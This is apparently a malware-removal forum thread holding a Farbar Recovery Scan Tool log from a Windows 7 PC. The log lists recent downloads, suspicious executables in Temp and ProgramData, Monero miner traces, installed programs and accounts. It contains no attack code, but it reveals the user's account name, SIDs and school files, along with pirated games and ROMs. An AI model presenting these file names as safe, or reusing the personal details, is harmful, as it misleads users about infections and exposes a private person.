2018-10-27 08:07 - 2006-08-26 00:15 - 000061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc70ita.dll
2018-10-27 08:07 - 2006-08-26 00:15 - 000061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc70fra.dll
2018-10-27 08:07 - 2006-08-26 00:15 - 000061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc70esp.dll
2018-10-27 08:07 - 2006-08-26 00:15 - 000061440 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc70deu.dll
2018-10-27 08:07 - 2006-08-26 00:15 - 000057344 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc70enu.dll
2018-10-27 08:07 - 2006-08-26 00:15 - 000049152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc70kor.dll
2018-10-27 08:07 - 2006-08-26 00:15 - 000049152 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc70jpn.dll
2018-10-27 08:07 - 2006-08-26 00:15 - 000045056 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc70cht.dll
2018-10-27 08:07 - 2006-08-26 00:15 - 000040960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfc70chs.dll
2018-10-27 08:07 - 2006-08-25 23:17 - 000086016 _____ (Microsoft Corporation) C:\Windows\SysWOW64\atl70.dll
2018-10-27 08:07 - 2001-08-23 00:00 - 001355776 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msvbvm50.dll
2018-10-27 08:07 - 1996-01-12 03:00 - 000722192 _____ (Microsoft Corporation) C:\Windows\SysWOW64\vb40032.dll
2018-10-27 08:07 - 1993-07-23 19:31 - 000210944 _____ C:\Windows\SysWOW64\msvcrt10.dll
2018-10-27 08:05 - 2018-10-27 08:05 - 000000218 _____ C:\Users\Betts\AppData\Local\recently-used.xbel
2018-10-26 22:45 - 2018-10-26 23:04 - 000000000 ____D C:\Users\Betts\Downloads\Counter Strike Global Offensive - Warzone
2018-10-24 22:44 - 2018-10-24 22:47 - 1528281108 _____ C:\Users\Betts\Downloads\PCSB00877_LSWTFA_01.00.VPK
2018-10-24 01:06 - 2018-10-24 01:06 - 001013569 _____ C:\Users\Betts\Downloads\precal1-week1-worksheet-answers.pdf
2018-10-23 22:48 - 2018-10-23 22:49 - 004138936 _____ C:\Users\Betts\Downloads\CPAR-Report.pptx
2018-10-23 22:05 - 2018-10-23 22:05 - 003037397 _____ C:\Users\Betts\Downloads\drive-download-20181023T140521Z-001.zip
2018-10-23 20:31 - 2018-10-23 20:31 - 000725009 _____ C:\Users\Betts\Downloads\Activity-4.5-Conic5s-Multiple-Choice-11B.pdf
2018-10-23 20:31 - 2018-10-23 20:31 - 000142872 _____ C:\Users\Betts\Downloads\Activity-4.2-Parabola-11B.pdf
2018-10-23 20:31 - 2018-10-23 20:31 - 000138356 _____ C:\Users\Betts\Downloads\Activity-4.4-Hyperbola-11B.pdf
2018-10-23 20:31 - 2018-10-23 20:31 - 000135464 _____ C:\Users\Betts\Downloads\Activity-4.3-Ellipse-11B-1.pdf
2018-10-23 20:29 - 2018-10-23 20:29 - 000143109 _____ C:\Users\Betts\Downloads\Activity-4.1-Circle-11B.pdf
2018-10-21 23:35 - 2018-10-21 23:35 - 027335038 _____ C:\Users\Betts\Downloads\[GamesMega]S.F.X.T(UPDATE1.08+AllDLC)[PCSE00005].rar
2018-10-21 23:00 - 2018-10-21 23:01 - 006835065 _____ C:\Users\Betts\Downloads\[GamesMega]HotlineMiami[PCSE00249_patch].zip
2018-10-21 22:42 - 2018-10-21 22:42 - 028213567 _____ C:\Users\Betts\Downloads\SFxT [US] Update 1.08.ZIP
2018-10-21 18:07 - 2018-10-21 18:08 - 008742877 _____ C:\Users\Betts\Downloads\UMvC3 UpDate+DLC [GamesMega.Net].rar
2018-10-21 16:38 - 2018-10-21 16:38 - 154723205 _____ C:\Users\Betts\Downloads\PCSE00597_Titan_Souls_01.00.VPK
2018-10-21 00:56 - 2018-10-21 01:22 - 1420803609 _____ C:\Users\Betts\Downloads\PCSB00070_UMvC3_01.00_C5_V2.0_TEST_WORKING.vpk
2018-10-20 23:43 - 2018-10-20 23:43 - 126117479 _____ C:\Users\Betts\Downloads\Hotline Miami.VPK
2018-10-20 14:05 - 2018-10-20 14:06 - 011095728 _____ C:\Users\Betts\Downloads\Crash of the Titans (E)(sUppLeX).zip
2018-10-20 14:04 - 2018-10-20 14:04 - 004220318 _____ C:\Users\Betts\Downloads\Megaman Battle Network 6 - Cybeast Gregar (U).zip
2018-10-20 14:03 - 2018-10-20 14:03 - 005247496 _____ C:\Users\Betts\Downloads\Metroid - Zero Mission (U) [!].zip
2018-10-20 14:02 - 2018-10-20 14:03 - 003849828 _____ C:\Users\Betts\Downloads\Metal Slug Advance (U).zip
2018-10-20 13:19 - 2018-10-20 13:20 - 005328420 _____ C:\Users\Betts\Downloads\Pokemon - Fire Red Version (U) (V1.1).zip
2018-10-20 13:18 - 2018-10-20 13:18 - 004724411 _____ C:\Users\Betts\Downloads\Kirby - Nightmare in Dreamland (U) [!].zip
2018-10-19 22:36 - 2018-10-28 11:47 - 000000000 ____D C:\Users\Betts\Desktop\vitahacks
2018-10-19 21:51 - 2018-10-19 21:53 - 000000000 ____D C:\Users\Betts\AppData\Roaming\soarqin
2018-10-19 21:21 - 2018-10-19 21:24 - 005845650 _____ C:\Users\Betts\Downloads\FinalHE_v1.5_win32.7z
2018-10-19 20:46 - 2018-10-19 20:46 - 000018486 _____ C:\Users\Betts\Downloads\bandcamp-dl-master.zip
2018-10-19 02:08 - 2018-10-19 02:08 - 162152863 _____ C:\Users\Betts\Downloads\PCSE01116.rar
2018-10-18 22:16 - 2018-10-18 22:16 - 467408743 _____ C:\Users\Betts\Downloads\Bastion.7z
2018-10-18 21:46 - 2018-10-18 21:46 - 000001065 _____ C:\Users\Public\Desktop\WinSCP.lnk
2018-10-18 21:40 - 2018-10-18 21:41 - 010191712 _____ (Martin Prikryl ) C:\Users\Betts\Downloads\WinSCP-5.13.4-Setup.exe
2018-10-18 21:07 - 2018-10-18 21:08 - 001196819 _____ C:\Users\Betts\Downloads\Vitamin_v2.0.vpk
2018-10-17 20:30 - 2018-10-17 21:03 - 630058137 _____ C:\Users\Betts\Downloads\Frank Ocean - Blonde - 2016 - Vinyl 24bit-20181017T122952Z-001.zip
2018-10-17 19:57 - 2018-10-17 20:13 - 304152722 _____ C:\Users\Betts\Downloads\Tyler, The Creator - Scum Fk Flower Boy (2017) FLAC-20181017T115746Z-001.zip
2018-10-17 00:26 - 2018-10-17 00:28 - 029946599 _____ C:\Users\Betts\Downloads\Sunflower - FLAC.zip
2018-10-17 00:19 - 2018-10-17 00:26 - 134742490 _____ C:\Users\Betts\Downloads\boy pablo - Roy Pablo.zip
2018-10-17 00:00 - 2018-10-17 00:00 - 095669742 _____ C:\Users\Betts\Downloads\Gus Dapperton - You Think You're a Comic!.zip
2018-10-16 23:53 - 2018-10-16 23:53 - 035378219 _____ C:\Users\Betts\Downloads\Gus Dapperton - Yellow and Such.zip
2018-10-16 23:32 - 2018-10-16 23:32 - 000010142 _____ C:\Users\Betts\Downloads\RedSea-master.zip
2018-10-15 18:25 - 2018-10-15 18:27 - 018619432 _____ C:\Users\Betts\Downloads\OTEGeographyLessons.zip
2018-10-15 18:15 - 2018-10-15 18:20 - 038987309 _____ C:\Users\Betts\Downloads\OCSTheMidnightEmotion.rar
2018-10-15 18:12 - 2018-10-15 18:13 - 019195032 _____ C:\Users\Betts\Downloads\TTala.zip
2018-10-15 18:03 - 2018-10-15 18:07 - 050552315 _____ C:\Users\Betts\Downloads\SOSWhateverThatWas.zip
2018-10-14 14:33 - 2018-10-14 14:34 - 000509876 _____ C:\Users\Betts\Downloads\PRECAL2 Lecture 2-3(1).pdf
2018-10-14 14:33 - 2018-10-14 14:33 - 000513356 _____ C:\Users\Betts\Downloads\PRECAL2 Lecture 2-2(1).pdf
2018-10-14 09:47 - 2018-10-14 09:47 - 000783891 _____ C:\Users\Betts\Downloads\PRECAL2 Lecture 1-1.pdf
2018-10-14 09:47 - 2018-10-14 09:47 - 000653176 _____ C:\Users\Betts\Downloads\PRECAL2 Lecture 1-4(1).pdf
2018-10-14 09:47 - 2018-10-14 09:47 - 000618669 _____ C:\Users\Betts\Downloads\PRECAL2 Lecture 1-2(1).pdf
2018-10-14 09:47 - 2018-10-14 09:47 - 000603772 _____ C:\Users\Betts\Downloads\PRECAL2 Lecture 1-3(1).pdf
2018-10-14 09:47 - 2018-10-14 09:47 - 000593259 _____ C:\Users\Betts\Downloads\PRECAL2 Lecture 2-1(1).pdf
2018-10-13 16:12 - 2018-10-13 16:13 - 000269906 _____ C:\Users\Betts\Downloads\National Museum Visit Guidelines.pdf
2018-10-12 19:19 - 2018-10-12 19:19 - 008678408 _____ C:\Users\Betts\Downloads\PH_patch_20181008to20181010_m6ft255i.exe
2018-10-12 18:40 - 2018-10-12 19:17 - 272476088 _____ C:\Users\Betts\Downloads\PH_patch_20181001to20181008_zpfenacb.exe
2018-10-12 17:40 - 2018-10-12 17:47 - 112919551 _____ C:\Users\Betts\Downloads\Head in the Clouds.zip
2018-10-12 17:38 - 2018-10-12 17:39 - 005977892 _____ C:\Users\Betts\Downloads\01 Peach Jam.m4a
2018-10-12 17:38 - 2018-10-12 17:38 - 004101472 _____ C:\Users\Betts\Downloads\05 CANT GET OVER YOU (feat. Clams C.m4a
2018-10-12 08:55 - 2018-10-12 08:55 - 000003450 _____ C:\Users\Betts\Downloads\11854839 - Copy of Grades - SY2018-2019-H1 Term 1.pdf
2018-10-10 20:53 - 2018-10-10 20:54 - 002999584 _____ C:\Users\Betts\Downloads\drive-download-20181010T125352Z-001.zip
2018-10-10 20:31 - 2018-10-10 20:31 - 000513356 _____ C:\Users\Betts\Downloads\PRECAL2 Lecture 2-2.pdf
2018-10-10 20:31 - 2018-10-10 20:31 - 000509876 _____ C:\Users\Betts\Downloads\PRECAL2 Lecture 2-3.pdf
2018-10-10 20:20 - 2018-10-10 20:20 - 000593259 _____ C:\Users\Betts\Downloads\PRECAL2 Lecture 2-1.pdf
2018-10-10 20:13 - 2018-10-10 20:13 - 000653176 _____ C:\Users\Betts\Downloads\PRECAL2 Lecture 1-4.pdf
2018-10-10 20:02 - 2018-10-10 20:02 - 000603772 _____ C:\Users\Betts\Downloads\PRECAL2 Lecture 1-3.pdf
2018-10-10 19:52 - 2018-10-10 19:52 - 000062309 _____ C:\Users\Betts\Downloads\Quiz.pptx
2018-10-09 21:00 - 2018-10-09 21:00 - 000018895 _____ C:\Users\Betts\Downloads\scdl-master.zip
2018-10-09 20:52 - 2018-10-09 20:52 - 000072526 _____ C:\Users\Betts\Downloads\Dummy-Critique_2018-2019-T2.pdf
2018-10-08 22:43 - 2018-10-08 22:43 - 000096290 _____ C:\Users\Betts\Downloads\bcg_comp_chapter4.pdf
2018-10-07 21:45 - 2018-10-07 21:45 - 001346432 _____ C:\Users\Betts\Downloads\drive-download-20181007T134510Z-001.zip
2018-10-07 15:22 - 2018-10-07 15:22 - 000000573 _____ C:\Windows\SysWOW64\nativelog.txt
2018-10-07 14:48 - 2018-10-07 14:49 - 016239064 _____ (Ventis Media Inc. ) C:\Users\Betts\Downloads\MediaMonkey_4.1.21.1875.exe
2018-10-07 14:46 - 2004-12-18 20:32 - 000038229 ____N (Generic) C:\Windows\SysWOW64\Drivers\StMp3Rec.sys
2018-10-07 14:45 - 2018-10-07 14:45 - 000000000 ____D C:\Windows\Downloaded Installations
2018-10-07 14:40 - 2018-10-07 14:45 - 059310760 _____ (Apple Computer, Inc. ) C:\Users\Betts\Downloads\iPodSetup.exe
2018-10-06 23:17 - 2018-10-06 23:18 - 002172676 _____ C:\Users\Betts\Downloads\Social REalism in the PHilippines Patrick Flores.pdf
2018-10-06 23:16 - 2018-10-06 23:16 - 000395753 _____ C:\Users\Betts\Downloads\Oct Nov Dec Group Members 2nd term 2018.pdf
2018-10-06 21:17 - 2018-10-09 21:41 - 000001417 _____ C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Internet Explorer.lnk
2018-10-06 21:17 - 2018-10-06 21:19 - 000000000 ____D C:\Users\Betts\AppData\Local\minergate
2018-10-06 21:14 - 2018-10-06 21:16 - 019537960 _____ C:\Users\Betts\Downloads\MinerGate-8.3-win64.exe
2018-10-06 21:01 - 2018-10-06 21:01 - 000441323 _____ C:\Users\Betts\Downloads\Miner___Minergate.rar
2018-10-06 20:50 - 2018-10-06 20:52 - 000000090 _____ C:\Users\Betts\Downloads\minergate_claymore_cpu_xmr.bat
2018-10-04 18:42 - 2018-10-28 11:46 - 000000000 ____D C:\Users\Betts\Desktop\CURATED
2018-10-03 21:41 - 2018-10-03 21:41 - 000329051 _____ C:\Users\Betts\Downloads\format.zip
2018-10-03 00:56 - 2018-10-03 00:56 - 000000033 _____ C:\Users\Betts\AppData\Roaming\AdobeWLCMCache.dat

==================== One Month Modified files and folders ========

(If an entry is included in the fixlist, the file/folder will be moved.)

2018-11-01 13:18 - 2018-01-18 23:28 - 003344536 _____ C:\Users\Betts\AppData\Roaming\msconfig.ini
2018-11-01 13:15 - 2013-04-28 10:48 - 000002235 _____ C:\Windows\epplauncher.mif
2018-11-01 13:11 - 2016-08-20 19:56 - 000000000 ____D C:\Users\Betts\AppData\Roaming\WindSolutions
2018-11-01 12:30 - 2016-02-08 20:39 - 000000000 ____D C:\Users\Betts\AppData\Roaming\Spotify
2018-11-01 10:39 - 2016-01-14 17:11 - 000000000 ____D C:\Users\Betts\AppData\Roaming\vlc
2018-11-01 10:36 - 2009-07-14 12:45 - 000038720 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2018-11-01 10:36 - 2009-07-14 12:45 - 000038720 ____H C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
2018-11-01 10:35 - 2017-06-11 23:02 - 000000000 ____D C:\Users\Betts\AppData\LocalLow\Mozilla
2018-11-01 10:31 - 2015-10-05 18:10 - 000000000 ____D C:\Users\Betts\Documents\ViberDownloads
2018-11-01 10:28 - 2017-12-07 20:12 - 000000000 ____D C:\Users\Betts\AppData\Local\CrashDumps
2018-11-01 10:25 - 2016-02-08 20:45 - 000000000 ____D C:\Users\Betts\AppData\Local\Spotify
2018-11-01 10:23 - 2018-01-20 17:47 - 000000458 _____ C:\Windows\Tasks\gxx speed launcher.job
2018-10-31 14:36 - 2016-12-14 22:01 - 000000000 ____D C:\ProgramData\boost_interprocess
2018-10-30 20:08 - 2018-06-23 20:21 - 000000000 ____D C:\Users\Betts\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Steam
2018-10-29 12:46 - 2018-02-06 17:03 - 000000000 ____D C:\Users\Betts\AppData\Local\Viber
2018-10-29 12:46 - 2015-10-05 17:34 - 000000000 ____D C:\Users\Betts\AppData\Roaming\ViberPC
2018-10-29 12:36 - 2018-08-23 19:35 - 000017529 _____ C:\ProgramData\2.exe
2018-10-29 12:36 - 2018-08-22 19:22 - 000017529 _____ C:\ProgramData\1.exe
2018-10-29 00:30 - 2014-01-26 11:43 - 000000305 ____H C:\Users\Betts\Documents\.picasa.ini
2018-10-28 11:48 - 2018-07-07 11:31 - 000000000 ____D C:\Users\Betts\Desktop\G11-FILES
2018-10-28 11:48 - 2018-02-16 09:20 - 000000000 ____D C:\Users\Betts\Desktop\memes
2018-10-28 11:46 - 2015-01-04 18:38 - 000000000 ____D C:\Users\Betts\Desktop\Songs
2018-10-28 11:45 - 2017-12-07 17:48 - 000000000 ____D C:\Users\Betts\Desktop\EDITS-BRUCEY
2018-10-28 08:14 - 2015-04-29 20:36 - 000000000 ____D C:\Windows\SysWOW64\directx
2018-10-27 18:13 - 2015-03-22 13:12 - 000000000 ____D C:\Program Files (x86)\Mozilla Maintenance Service
2018-10-27 08:06 - 2014-11-12 17:53 - 000000000 ____D C:\temp
2018-10-26 22:43 - 2017-08-26 22:10 - 000000000 ____D C:\Program Files (x86)\Mozilla Firefox
2018-10-23 20:53 - 2017-09-08 21:30 - 000002441 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Acrobat Reader DC.lnk
2018-10-22 20:46 - 2017-08-18 22:43 - 000000000 ____D C:\Program Files (x86)\arcai.com
2018-10-20 12:04 - 2017-03-25 22:55 - 000000600 _____ C:\Users\Betts\AppData\Roaming\winscp.rnd
2018-10-19 02:44 - 2009-07-14 13:13 - 000006426 _____ C:\Windows\system32\PerfStringBackup.INI
2018-10-18 21:46 - 2017-03-25 22:50 - 000001077 _____ C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinSCP.lnk
2018-10-18 21:46 - 2017-03-25 22:50 - 000000000 ____D C:\Program Files (x86)\WinSCP
2018-10-15 20:01 - 2018-08-13 20:48 - 000000512 ____H C:\Users\Betts\Downloads\.picasa.ini
2018-10-14 09:23 - 2016-07-31 19:04 - 000000000 ____D C:\Users\Betts\AppData\Roaming\deluge
2018-10-07 15:34 - 2014-02-22 14:14 - 000000000 ____D C:\Users\Betts\AppData\Local\ElevatedDiagnostics
2018-10-07 15:22 - 2013-09-22 14:50 - 000000000 ____D C:\Program Files (x86)\Minecraft
2018-10-07 15:22 - 2013-06-23 16:40 - 000000000 ____D C:\Users\Betts\AppData\Roaming\.minecraft
2018-10-07 15:19 - 2016-02-23 18:41 - 000000000 ____D C:\Users\Betts\AppData\Roaming\MediaMonkey
2018-10-07 15:04 - 2013-05-31 13:39 - 000000000 ____D C:\Users\Betts\AppData\LocalLow\Adobe
2018-10-07 14:47 - 2013-04-28 10:30 - 000000000 ___HD C:\Program Files (x86)\InstallShield Installation Information
2018-10-07 14:46 - 2009-07-14 11:20 - 000000000 ____D C:\Windows\inf
2018-10-06 15:24 - 2017-10-15 23:32 - 000000000 ____D C:\Users\Betts\.idlerc
2018-10-05 22:14 - 2013-07-27 09:57 - 000000000 ____D C:\Games
2018-10-03 00:57 - 2015-06-16 21:27 - 000000918 _____ C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-1722513563-2756437970-1780137624-1000UA.job
2018-10-02 21:56 - 2015-06-16 21:27 - 000000866 _____ C:\Windows\Tasks\DropboxUpdateTaskUserS-1-5-21-1722513563-2756437970-1780137624-1000Core.job
2018-10-02 19:29 - 2009-07-14 12:45 - 005237776 _____ C:\Windows\system32\FNTCACHE.DAT
2018-10-02 19:20 - 2009-07-14 13:08 - 000000006 ____H C:\Windows\Tasks\SA.DAT

==================== Files in the root of some directories =======

2018-08-22 19:22 - 2018-10-29 12:36 - 000017529 _____ () C:\ProgramData\1.exe
2018-08-23 19:35 - 2018-10-29 12:36 - 000017529 _____ () C:\ProgramData\2.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 000285184 ____H (Microsoft Corporation) C:\ProgramData\audio.exe
2018-08-22 20:32 - 2018-08-18 06:21 - 000603352 _____ (Alexander Roshal) C:\ProgramData\xhhjtiwtw.exe
2018-01-17 15:58 - 2018-01-17 19:17 - 001105920 _____ (Microsoft) C:\ProgramData\XMR Builder.exe
2018-10-03 00:56 - 2018-10-03 00:56 - 000000033 _____ () C:\Users\Betts\AppData\Roaming\AdobeWLCMCache.dat
2016-08-13 10:40 - 2016-08-13 11:57 - 000002032 _____ () C:\Users\Betts\AppData\Roaming\droid4xinstaller.log
2018-01-18 23:28 - 2018-11-01 13:18 - 003344536 _____ () C:\Users\Betts\AppData\Roaming\msconfig.ini
2013-12-23 18:06 - 2016-03-25 22:32 - 000045270 _____ () C:\Users\Betts\AppData\Roaming\room_v3.dat
2017-03-25 22:55 - 2018-10-20 12:04 - 000000600 _____ () C:\Users\Betts\AppData\Roaming\winscp.rnd
2018-08-22 19:27 - 2018-08-22 19:27 - 000011568 _____ () C:\Users\Betts\AppData\Local\InstallationConfiguration.xml
2018-08-22 19:27 - 2018-08-22 19:27 - 000140800 _____ () C:\Users\Betts\AppData\Local\installer.dat
2018-06-12 22:24 - 2018-06-12 22:24 - 000004096 ____H () C:\Users\Betts\AppData\Local\keyfile3.drm
2018-10-27 08:05 - 2018-10-27 08:05 - 000000218 _____ () C:\Users\Betts\AppData\Local\recently-used.xbel
2017-12-07 19:22 - 2018-01-13 18:27 - 000007608 _____ () C:\Users\Betts\AppData\Local\Resmon.ResmonCfg
2018-08-22 19:27 - 2018-08-22 19:27 - 001413120 _____ () C:\Users\Betts\AppData\Local\sham.db
2014-08-31 10:30 - 2014-08-31 10:30 - 000000000 _____ () C:\Users\Betts\AppData\Local\{7018210F-C569-4660-8EC7-AF4BD353B0B6}
2017-11-15 18:57 - 2017-11-15 18:57 - 000000345 _____ () C:\Users\Betts\AppData\Local\~Report2.txt

Files to move or delete:
====================
C:\Users\Betts\AppData\Local\Temp\svchost.exe ..
C:\ProgramData\audio.exe ..
C:\Users\Betts\AppData\Roaming\msconfig.ini


Some files in TEMP:
====================
2018-08-22 20:31 - 2018-08-22 20:31 - 000552448 _____ () C:\Users\Betts\AppData\Local\Temp\11AD.tmp.exe
2018-08-22 19:32 - 2018-08-22 19:32 - 000495104 _____ () C:\Users\Betts\AppData\Local\Temp\1B4C.tmp.exe
2018-08-22 20:31 - 2018-08-22 20:31 - 000185104 _____ () C:\Users\Betts\AppData\Local\Temp\222.tmp.exe
2018-08-22 19:26 - 2018-08-22 21:06 - 000079872 _____ () C:\Users\Betts\AppData\Local\Temp\23435.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 000163328 _____ () C:\Users\Betts\AppData\Local\Temp\2FA4.tmp.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 000110592 _____ () C:\Users\Betts\AppData\Local\Temp\317.tmp.exe
2018-08-22 19:20 - 2018-08-22 19:26 - 000001020 _____ () C:\Users\Betts\AppData\Local\Temp\419204dddd.exe
2018-08-22 19:26 - 2018-08-22 21:06 - 010522026 _____ () C:\Users\Betts\AppData\Local\Temp\allradio_4.27_portable.exe
2018-08-22 19:28 - 2018-08-22 19:29 - 001004032 _____ () C:\Users\Betts\AppData\Local\Temp\AmazonShoppingAssistant.exe
2018-08-22 19:26 - 2018-08-22 19:26 - 000020480 _____ (CatX) C:\Users\Betts\AppData\Local\Temp\cubesta.exe
2018-08-22 19:32 - 2018-08-22 19:32 - 041735680 _____ (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\DBBC.tmp.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 000163840 _____ () C:\Users\Betts\AppData\Local\Temp\F83D.tmp.exe
2018-08-22 19:19 - 2018-08-22 19:19 - 004009147 _____ () C:\Users\Betts\AppData\Local\Temp\fag.exe
2018-08-22 19:19 - 2018-08-22 19:19 - 000622592 _____ (DianneLMeans@armyspy.com ) C:\Users\Betts\AppData\Local\Temp\fagw.exe
2018-04-29 14:05 - 2018-07-24 14:30 - 000450880 _____ (Garena Online ) C:\Users\Betts\AppData\Local\Temp\Garena.exe
2018-08-22 19:28 - 2018-08-22 19:28 - 000420191 _____ ( ) C:\Users\Betts\AppData\Local\Temp\global_installer.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 002291565 _____ (Godogic ) C:\Users\Betts\AppData\Local\Temp\JavaSetup_2179753812.exe
2018-08-22 19:28 - 2018-08-22 19:28 - 000176912 _____ () C:\Users\Betts\AppData\Local\Temp\ketup.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 000163840 _____ () C:\Users\Betts\AppData\Local\Temp\KYlXSzGXn6oMeeHruwfwlWqCS.exe
2018-08-22 19:27 - 2018-08-22 21:10 - 000484352 _____ () C:\Users\Betts\AppData\Local\Temp\lame_enc.dll
2018-08-22 21:03 - 2018-08-21 04:01 - 000858912 _____ (Malwarebytes) C:\Users\Betts\AppData\Local\Temp\mb-clean.exe
2018-08-22 21:03 - 2018-08-22 21:00 - 082624400 _____ (Malwarebytes ) C:\Users\Betts\AppData\Local\Temp\mb3-setup-consumer-3.5.1.2522-1.0.421-1.0.6439.exe
2018-08-22 19:19 - 2018-08-22 19:19 - 002951680 _____ (©Ludekolfoidgu kyosehicell ) C:\Users\Betts\AppData\Local\Temp\MediaPlay.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 000181520 _____ () C:\Users\Betts\AppData\Local\Temp\merun.exe
2018-08-22 19:29 - 2018-08-22 19:29 - 000290304 _____ () C:\Users\Betts\AppData\Local\Temp\MPlayer1006.exe
2018-08-22 19:29 - 2018-08-22 19:29 - 000000000 _____ () C:\Users\Betts\AppData\Local\Temp\novol.exe
2012-11-11 02:20 - 2012-11-11 02:20 - 000150600 ____R (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\ose00000.exe
2012-11-11 02:20 - 2012-11-11 02:20 - 000150600 ____R (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\ose00001.exe
2012-11-11 02:20 - 2012-11-11 02:20 - 000150600 ____R (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\ose00002.exe
2012-11-11 02:20 - 2012-11-11 02:20 - 000150600 ____R (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\ose00003.exe
2012-11-11 02:20 - 2012-11-11 02:20 - 000150600 ____R (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\ose00004.exe
2012-11-11 02:20 - 2012-11-11 02:20 - 000150600 ____R (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\ose00005.exe
2012-11-11 02:20 - 2012-11-11 02:20 - 000150600 ____R (Microsoft Corporation) C:\Users\Betts\AppData\Local\Temp\ose00006.exe
2018-08-22 19:28 - 2018-08-22 19:28 - 000343552 _____ () C:\Users\Betts\AppData\Local\Temp\RegOrganizer.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 002294272 _____ (TODO: <Company name>) C:\Users\Betts\AppData\Local\Temp\setup.exe
2018-08-22 19:27 - 2018-08-22 19:28 - 001323008 _____ (TigerTrade ) C:\Users\Betts\AppData\Local\Temp\sprun.exe
2018-10-06 21:04 - 2018-11-01 10:24 - 000169984 _____ () C:\Users\Betts\AppData\Local\Temp\svchost.exe
2018-08-22 19:27 - 2018-08-22 19:27 - 000339968 _____ () C:\Users\Betts\AppData\Local\Temp\TigerTrade.exe
2018-08-22 19:19 - 2018-08-22 19:19 - 000016384 _____ (Nicole R. Cosentino ) C:\Users\Betts\AppData\Local\Temp\tuna.exe
2018-10-07 15:22 - 2017-04-06 01:05 - 000134000 _____ () C:\Users\Betts\AppData\Local\Temp\Uninstall.exe
2018-05-09 07:29 - 2018-05-09 07:29 - 001130840 _____ (Google Inc.) C:\Users\Betts\AppData\Local\Temp\{E2831398-803C-4CAF-A96F-A6261E0523C5}-GoogleUpdateSetup.exe

==================== Bamital & volsnap ======================

(There is no automatic fix for files that do not pass verification.)

C:\Windows\system32\winlogon.exe => File is digitally signed
C:\Windows\system32\wininit.exe => File is digitally signed
C:\Windows\SysWOW64\wininit.exe => File is digitally signed
C:\Windows\explorer.exe => File is digitally signed
C:\Windows\SysWOW64\explorer.exe => File is digitally signed
C:\Windows\system32\svchost.exe => File is digitally signed
C:\Windows\SysWOW64\svchost.exe => File is digitally signed
C:\Windows\system32\services.exe => File is digitally signed
C:\Windows\system32\User32.dll => File is digitally signed
C:\Windows\SysWOW64\User32.dll => File is digitally signed
C:\Windows\system32\userinit.exe => File is digitally signed
C:\Windows\SysWOW64\userinit.exe => File is digitally signed
C:\Windows\system32\rpcss.dll => File is digitally signed
C:\Windows\system32\dnsapi.dll => File is digitally signed
C:\Windows\SysWOW64\dnsapi.dll => File is digitally signed
C:\Windows\system32\Drivers\volsnap.sys => File is digitally signed

LastRegBack: 2018-10-02 20:08

==================== End of FRST.txt ============================
 

Broni

Malware Annihilator
Additional scan result of Farbar Recovery Scan Tool (x64) Version: 24.10.2018
Ran by Betts (01-11-2018 13:18:23)
Running from C:\Users\Betts\Desktop
Windows 7 Professional Service Pack 1 (X64) (2013-04-28 02:26:42)
Boot Mode: Normal
==========================================================


==================== Accounts: =============================

Administrator (S-1-5-21-1722513563-2756437970-1780137624-500 - Administrator - Disabled)
Betts (S-1-5-21-1722513563-2756437970-1780137624-1000 - Administrator - Enabled) => C:\Users\Betts
Guest (S-1-5-21-1722513563-2756437970-1780137624-501 - Limited - Enabled)
HomeGroupUser$ (S-1-5-21-1722513563-2756437970-1780137624-1003 - Limited - Enabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AS: Windows Defender (Disabled - Out of date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

A360 Desktop (HKLM\...\{7758802D-9486-4883-9927-CCAC366A3BA4}) (Version: 7.2.3.1800 - Autodesk)
ACA & MEP 2017 Object Enabler (HKLM\...\{28B89EEF-0004-0000-5102-CF3F3A09B77D}) (Version: 7.9.45.0 - Autodesk) Hidden
ACAD Private (HKLM\...\{28B89EEF-0001-0000-3102-CF3F3A09B77D}) (Version: 21.0.52.0 - Autodesk) Hidden
Acrylic Wi-Fi Professional v3.2 (HKU\S-1-5-21-1722513563-2756437970-1780137624-1000\...\{FBD2EDDA-2B1B-49A2-9147-99CBCC5F10E5}_is1) (Version: 3.2 - Tarlogic Research S.L.)
Adobe Acrobat 5.0 (HKLM-x32\...\Adobe Acrobat 5.0) (Version: 5.0 - Adobe Systems, Inc.)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 19.008.20080 - Adobe Systems Incorporated)
Adobe After (HKLM\...\{6A915992-D887-4897-82F5-950EDD12DEB1}) (Version: 1.0.0000 - Adobe Systems Incorporated) Hidden
